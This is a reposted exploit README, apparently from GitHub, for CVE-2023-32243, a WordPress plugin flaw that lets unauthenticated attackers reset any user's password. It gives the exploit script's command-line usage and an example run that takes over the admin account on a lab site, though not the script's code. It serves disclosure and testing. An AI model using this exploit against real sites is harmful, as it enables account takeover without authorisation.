Essential Addons for Elementor 5.4.0-5.7.1 – Unauthenticated Privilege Escalation

渗透技巧 11个月前 admin
248 0 0

CVE-2023-32243.

Essential Addons for Elementor 5.4.0-5.7.1 – Unauthenticated Privilege Escalation

Info

The plugin does not validate the password reset key, which could allow unauthenticated attackers to reset arbitrary account’s password to anything they want, by knowing the related email or username, gaining access to them

Exploit Details

https://patchstack.com/articles/critical-privilege-escalation-in-essential-addons-for-elementor-plugin-affecting-1-million-sites/

Usage

usage: exploit.py [-h] -u URL -p PASSWORD [-usr USERNAME]

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL of the WordPress site
  -p PASSWORD, --password PASSWORD
                        Password to set for the selected username
  -usr USERNAME, --username USERNAME
                        Username of the user to reset if you already know it.

Example

python3 exploit.py --url http://wordpress.lan  --password "adminadmin2"
Please select a username:
1. admin
> 1
Nonce value: f010bc2ac9
All Set! You can now login using the following credentials:
Username:  admin
Password:  adminadmin2
Admin Url: http://wordpress.lan/wp-admin/

 

原文始发于Github:Essential Addons for Elementor 5.4.0-5.7.1 – Unauthenticated Privilege Escalation

版权声明:admin 发表于 2023年5月18日 下午8:31。
转载请注明:Essential Addons for Elementor 5.4.0-5.7.1 – Unauthenticated Privilege Escalation | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...